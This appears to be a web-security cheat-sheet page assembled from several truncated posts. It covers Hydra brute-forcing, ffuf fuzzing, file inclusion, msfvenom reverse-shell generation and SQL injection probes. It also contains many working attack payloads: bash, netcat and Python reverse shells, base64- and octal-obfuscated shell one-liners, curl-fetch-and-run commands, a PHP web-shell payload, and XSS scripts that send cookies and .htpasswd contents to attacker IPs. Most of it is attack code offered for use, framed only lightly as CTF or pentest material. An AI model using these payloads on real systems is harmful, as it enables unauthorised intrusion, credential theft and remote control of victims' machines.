Web-Security

Hydra is a powerful tool used for performing brute-force attacks on various services. In this tutorial, we’ll explore brute-forcing login pages using different HTTP methods with Hydra. Brute Force Login Page with HTTP GET Method: hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt $IP http-get /manager/html -s 8080 hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://$IP:8080/manager/html Initiates the Hydra tool and specifies the target URL using the HTTP GET method. Brute Force Login Page with HTTP POST Method: hydra -l darren -P /usr/share/dict/rockyou.txt 10.10.69.229 http-post-form '/:user=^USER^&pass=^PASS^:F=Error: Invalid username or password' -s 8088 hydra -l '' -P 3_digit_pin.txt $IP http-form-post '/login.php:pin=^PASS^:F=Access denied' -s 8000 -v -f Initiates the Hydra tool and specifies the target URL using the HTTP POST method. Brute Force Credentials of POP3 Protocol: hydra -l doak -P /usr/share/dict/fasttrack.txt pop3://$IP -s 55007 Brute Force Credentials of SSH Protocol: hydra -l meliodas -P /usr/share/dict/rockyou.txt ssh://$IP Brute Force Credentials of SNMP Protocol: hydra -P /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt snmp://10.10.152.137 Hydra Options Explained: -C <file>: Specifies the path to the file containing a list of username and password combinations. i.e, admin:admin -L <username file>: Specifies the path to a file containing a list of usernames. -l <username>: Specifies a single username to use for the brute-force attack. -P <password file>: Specifies the path to a file containing a list of passwords. -p <password>: Specifies a single password to use for the brute-force attack. -f / -F : exit when a login/pass pair is found (-M: -f per host, -F global) $IP: Represents the IP address of the target. -s <port>: Specifies the target port. http-get: Initiates a brute-force attack using the HTTP GET method. http-post-form: Initiates a brute-force attack using the HTTP POST method with form parameters. pop3://<IP>: Specifies the POP3 protocol and target IP address. ssh://<IP>: Specifies the SSH protocol and target IP address. snmp://<IP>: Specifies the SNMP protocol and target IP address. Additional flags and options may be included for more detailed configuration and verbose output.

1. Directory and File Brute Forcing Basic Directory Fuzzing: ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ/ Fuzz common directory names (e.g., /admin/, /uploads/). 2. Fuzzing Parameters Basic Parameter Fuzzing: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ Replaces FUZZ with words from the wordlist to test URL parameters. Filter by Status Code: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -mc 200 Shows responses only for the 200 OK status code. Filter by Content Size: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -fs 150 Filters results based on exact response size in bytes. Fuzzing with JSON Payload (for APIs): ...

File Inclusion and Path Traversal At a Glance File inclusion is the method for applications, and scripts, to include local or remote files during run-time. The vulnerability occurs when an application generates a path to executable code using an attacker-controlled variable, giving the attacker control over which file is executed. There are two different types. Local File Inclusion (LFI) where the application includes files on the current server. And Remote File Inclusion (RFI) where the application downloads and execute files from a remote server. 1 ...

Note: Always remember to use the same payload in msfconsole as you used to generate in msfvenom. Linux Reverse Shell (extension doesn’t matter for Linux) msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f elf -o shell.elf Payload Type: Shell Reverse TCP Suitable for: Linux systems, Netcat listener required. Windows x64 Reverse Shell msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe -o shell.exe Payload Type: Windows x64 Meterpreter Reverse TCP Suitable for: 64-bit Windows systems, spawns a Meterpreter session. ...

These codes indicate that the request was successfully received, understood, and accepted. 200 OK: The request was successful. 201 Created: The request was successful, and a resource was created. 202 Accepted: The request has been accepted but not yet processed. 204 No Content: The request was successful, but there is no content to send back. 3xx: Redirection These codes indicate that further action is needed to complete the request. 301 Moved Permanently: The resource has been permanently moved to a new URL. ...

Target File .htaccess Output with PHP String Filters No Filter Applied Output: Testing PHP Filter Payload: php://filter/convert.base64-encode/resource=.htaccess Output: VGVzdGluZyBQSFAgRmlsdGVy Payload: php://filter/string.rot13/resource=.htaccess Output: Grfgvat CUC Svygre Payload: php://filter/string.toupper/resource=.htaccess Output: TESTING PHP FILTER Payload: php://filter/string.tolower/resource=.htaccess Output: testing php filter Payload: php://filter/string.strip_tags/resource=.htaccess Output: Testing PHP Filter This filter remove any HTML or PHP tags from the file contents. PHP Payload: <?php system($_GET['cmd']); echo 'Shell done!'; ?> Payload for LIF to RCE: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+&cmd=whoami Output: www-data

bash -c 'bash -i >& /dev/tcp/10.10.10.14/9001 0>&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f Reverse Shell Payload with Encoded Command bash -c echo${IFS}YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx|base64${IFS}-d|bash bash -c {echo,YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx}|{base64,-d}|{bash,-i} Best way to escape bad character (Recommended) echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.37/9001 <&1'" > revshell.sh curl$IFS'10.10.14.37/revshell.sh'$IFS'-o'$IFS'/tmp/revshell.sh' bash$IFS'/tmp/revshell.sh' Reverse Shell by using octal escape sequences Generating RevShell (escape sequence) echo -n "/bin/sh -c 'sh -i >& /dev/tcp/10.10.14.56/9001 0>&1'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g' echo -n "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.56\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g' Generating RevShell (Hex escape sequence) echo -n "sh -c 'exec sh -i &>/dev/tcp/10.10.14.56/9001 <&1'" | xxd -p|tr -d '\n'|sed 's/../\\x&/g' Executing RevShell (Never forgot to URL encode if you are sending via HTTP/s method) printf '\057\142\151\156\057\163\150\040\055\143\040\047\057\142\151\156\057\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\060\056\061\060\056\061\064\056\065\066\057\071\060\060\061\040\060\076\046\061\047'|sh Additional Shell Options and Tools Don’t forget to check with other shells such as sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash. Additionally, consider using Socat for more flexibility: ...

Identifying SQL Injection Vulnerability Parameters Comments in SQL -- MySQL Linux style --+ MySQL Windows style # Hash (URL encode while use) --+- SQL comment ;%00 Null Byte ` Backtick To ascertain SQL injection vulnerability in parameters, test various symbols and observe any error or unusual behavior. Common symbols include: id=[Nothing] id=' id='' id=" id=` id=') id=") id=`) id=')) id=")) id=`)) Examples of SQL Injection Testing Perform SQL injection testing with different payloads. If the payload results in an error or unexpected behavior, it might indicate a vulnerability. Examples include: ...

1. Steal File Content Using Inline XSS Script (HTML) <script> fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd") .then(response => response.text()) .then(data => { fetch("http://10.10.14.228/?data=" + encodeURIComponent(data)); }) .catch(error => console.error("Error fetching the messages:", error)); </script> Explanation: This script tries to read the .htpasswd file from a vulnerable server using a local file inclusion (LFI) or file read vulnerability in the URL parameter file. Then, it sends the stolen file content back to your attacker server (10.10.14.228) using an HTTP request with the data URL-encoded. Works in XSS vulnerable pages where you can inject JS. How to use: Inject this script into an XSS vulnerable parameter or stored XSS vector. Make sure your attacker machine (10.10.14.228) is ready to receive GET requests and log the data parameter. Example listener (using nc or a simple Python HTTP server) to capture data: nc -lvnp 80 # or python3 -m http.server 80 2. External JS File to Steal File Content via XSS (JavaScript) // Usage: // Spawn python HTTP server on attacker box: python3 -m http.server 1212 // Inject in vulnerable page: <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script> var url = "http://127.0.0.1/dir/pass.txt"; // Target file on victim var attacker = "http://10.9.179.230:1212/steal_page_content_xss.js"; var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { // send base64 encoded stolen content to attacker server fetch(attacker + "?" + encodeURI(btoa(xhr.responseText))) } } xhr.open('GET', url, true); xhr.send(null); Explanation: This script fetches a local file on the victim machine (http://127.0.0.1/dir/pass.txt) via the victim’s browser. When the file is fully loaded (DONE), it encodes the content in Base64 (btoa) to safely transmit binary or special characters. Then sends this encoded content back to attacker server by requesting the script file with data as query string (?data=...). Requires you to host this script on your attacker machine (10.9.179.230) and have an HTTP server running on port 1212. How to use: Start HTTP server on attacker box: python3 -m http.server 1212 Inject <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script> into an XSS vulnerable page. Monitor requests on your attacker server to capture the Base64 encoded file contents in the URL. Decode captured Base64 content: echo "base64_encoded_string" | base64 -d > stolen_file.txt Summary Notes: These methods depend on the target browser having access to local files via URL paths (like 127.0.0.1) or vulnerable parameters (LFI). Base64 encoding helps send files safely in GET requests. Must have control over attacker server to catch stolen data. Use during CTF challenges, penetration testing, or in controlled environments. Always check the same-origin policy and CORS restrictions which may block requests in real-world targets.

🎯 Basic Payloads <svg/onload="alert(document.cookie)"> <iframe src="data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIiAvPgo8L3N2Zz4="></iframe> <script>var i=new Image(); i.src="http://10.10.14.54/?cookie="+btoa(document.cookie);</script> <script>var i=new Image;i.src="http://10.10.14.7:8888/?cookie="+document.cookie;</script> <script> document.write('<img src="http://10.10.14.54/?cookie='+document.cookie+'" />'); </script> <img src/onerror=this.src="http://10.10.14.74/?cookie="+btoa(document.cookie)> <img src="http://10.10.14.54/" onload="var i=0;if(i++)this.src+='?cookie='+encodeURIComponent(document.cookie);"/> <script>fetch('http://10.10.14.19:8000/?cookie=' + btoa(document.cookie));</script> 🧨 Local File Access / Script Injection <img src=xasdasdasd onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/> <img src=gdgdgdfgert onerror="document.write('<script src=http://127.0.0.1/test.js></script>')"/> <img src=x onerror=fetch('http://10.10.xx.xx/?cookie='+document.cookie);> 🕵️‍♂️ WAF Bypass Strings for XSS <Img src = x onerror = "javascript: window.onerror = alert; throw XSS"> <Video> <source onerror = "javascript: alert (XSS)"> <Input value = "XSS" type = text> <applet code="javascript:confirm(document.cookie);"> <isindex x="javascript:" onmouseover="alert(XSS)"> "></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><img src="x:x" onerror="alert(XSS)"> "><iframe src="javascript:alert(XSS)"> <object data="javascript:alert(XSS)"> <isindex type=image src=1 onerror=alert(XSS)> <img src=x:alert(alt) onerror=eval(src) alt=0> <img src="x:gif" onerror="window "></img> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert(1)">X </script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'> <style>//*{x:expression(alert(/xss/))}//<style></style> 📚 Resources 🔗 OWASP XSS Filter Evasion Cheat Sheet ...